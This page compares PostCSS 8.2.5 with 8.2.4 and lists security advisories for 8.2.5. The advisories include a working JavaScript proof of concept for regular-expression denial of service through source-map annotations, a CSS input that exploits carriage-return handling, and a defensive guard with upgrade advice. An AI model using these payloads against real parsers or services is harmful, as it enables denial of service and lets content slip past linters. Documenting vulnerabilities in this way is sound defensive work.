PostCSS 8.2.5 represents a minor update to the popular PostCSS tool, designed for transforming CSS with JavaScript plugins. Comparing it to the previous stable version, 8.2.4, there are a few subtle but potentially relevant differences for developers. Both releases share core characteristics: they maintain consistent dependencies on nanoid, colorette, and source-map, ensuring continued compatibility with these utility libraries. They also uphold the MIT license, signifying permissive usage, and are developed by Andrey Sitnik. Both versions are distributed via npm, are hosted on GitHub, and support the PostCSS Open Collective.
The most noticeable change is a slight increase in the unpacked size of the package, from 203350 bytes in version 8.2.4 to 203659 bytes in version 8.2.5. While small, this could indicate minor code additions, optimizations, or modifications in the updated release. The other key difference is the release date: version 8.2.5 was released on February 6, 2021, so it incorporates any bug fixes, performance tweaks, or feature enhancements made since the January 9, 2021 release of version 8.2.4. Developers should consult the changelog, if available, to identify the specific changes in version 8.2.5 and determine whether they affect their usage. The slight increase in package size, combined with the newer release date, suggests incremental improvements, making 8.2.5 a potentially worthwhile upgrade for users seeking the most up-to-date version of PostCSS within the 8.2.x series.
All vulnerabilities affecting version 8.2.5 of the package:
Regular Expression Denial of Service in postcss
The npm package postcss from 7.0.0 and before versions 7.0.36 and 8.2.10 is vulnerable to Regular Expression Denial of Service (ReDoS) during source map parsing.
Regular Expression Denial of Service in postcss
The package postcss versions before 7.0.36 or between 8.0.0 and 8.2.13 are vulnerable to Regular Expression Denial of Service (ReDoS) via getAnnotationURL() and loadAnnotation() in lib/previous-map.js. The vulnerable regexes are caused mainly by the sub-pattern
\/\*\s* sourceMappingURL=(.*)
Proof of concept demonstrating the slowdown:

var postcss = require("postcss")

// Builds a stylesheet followed by n source-map annotation openers that are never closed.
function build_attack(n) {
    var ret = "a{}"
    for (var i = 0; i < n; i++) {
        ret += "/*# sourceMappingURL="
    }
    return ret + "!";
}

// Warm-up parse, then time source-map parsing on inputs of growing length.
postcss.parse('a{}/*# sourceMappingURL=a.css.map */')
for (var i = 1; i <= 500000; i++) {
    if (i % 1000 == 0) {
        var time = Date.now();
        var attack_str = build_attack(i)
        try {
            postcss.parse(attack_str)
            var time_cost = Date.now() - time;
            console.log("attack_str.length: " + attack_str.length + ": " + time_cost + " ms");
        } catch (e) {
            var time_cost = Date.now() - time;
            console.log("attack_str.length: " + attack_str.length + ": " + time_cost + " ms");
        }
    }
}
PostCSS line return parsing error
An issue was discovered in PostCSS before 8.4.31. It affects linters using PostCSS to parse external Cascading Style Sheets (CSS). There may be \r discrepancies, as demonstrated by @font-face{ font:(\r/*);} in a rule.
This vulnerability affects linters using PostCSS to parse external untrusted CSS. An attacker can prepare CSS in such a way that it contains parts parsed by PostCSS as a CSS comment. After processing by PostCSS, those parts are included in the PostCSS output in CSS nodes (rules, properties) despite originally being inside a comment.
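A defender-side pre-processing step covering both issues on this page, added here as an example and not code from the PostCSS project: it applies the CSS Syntax Level 3 input preprocessing (CR, FF and CRLF become LF, NUL becomes U+FFFD), which removes the \r discrepancy before an older PostCSS tokenizes the input, and it refuses input shaped like the ReDoS proof of concept above (an unusual number of source-map annotation openers). Function names, the constructed sample inputs and the threshold of 8 annotations are assumptions.

```javascript
// Added example (hypothetical names), not PostCSS project code.

// CSS Syntax Level 3, section 3.3 "Preprocessing the input stream":
// CR, FF and CRLF become LF; NUL becomes U+FFFD. Doing this before an
// older PostCSS parses untrusted CSS removes the "\r" discrepancy.
function preprocessCss(css) {
  return css.replace(/\r\n|\r|\f/g, '\n').replace(/\0/g, '\uFFFD');
}

// Counts "/*# sourceMappingURL=" openers. The vulnerable regexes in
// lib/previous-map.js are driven by exactly this prefix, and the ReDoS
// proof of concept repeats it thousands of times without closing it.
function countSourceMapAnnotations(css) {
  const re = /\/\*\s*#\s*sourceMappingURL=/g;
  let n = 0;
  while (re.exec(css) !== null) n++;
  return n;
}

// Normalizes the input and decides whether a linter should hand it to the
// parser at all. The threshold (8) is an assumption: a real stylesheet
// carries at most a handful of source-map annotations.
function prepareUntrustedCss(css, maxAnnotations = 8) {
  const normalized = preprocessCss(css);
  const annotations = countSourceMapAnnotations(normalized);
  return {
    css: normalized,
    hadCarriageReturn: /\r/.test(css),   // worth logging: CR in CSS is unusual
    annotations,
    accept: annotations <= maxAnnotations
  };
}

// Constructed samples: the advisory's "\r" trick and a miniature PoC shape.
const crSample = '@font-face{ font:(\r/*);}';
const redosSample = 'a{}' + '/*# sourceMappingURL='.repeat(20) + '!';

console.log(prepareUntrustedCss(crSample));     // accept: true, css uses "\n"
console.log(prepareUntrustedCss(redosSample));  // accept: false, 20 annotations
```

Upgrading to a fixed release (8.2.13 or later for the ReDoS issues, 8.4.31 or later for the \r issue) is the actual fix; this guard only limits exposure for linters that cannot upgrade yet.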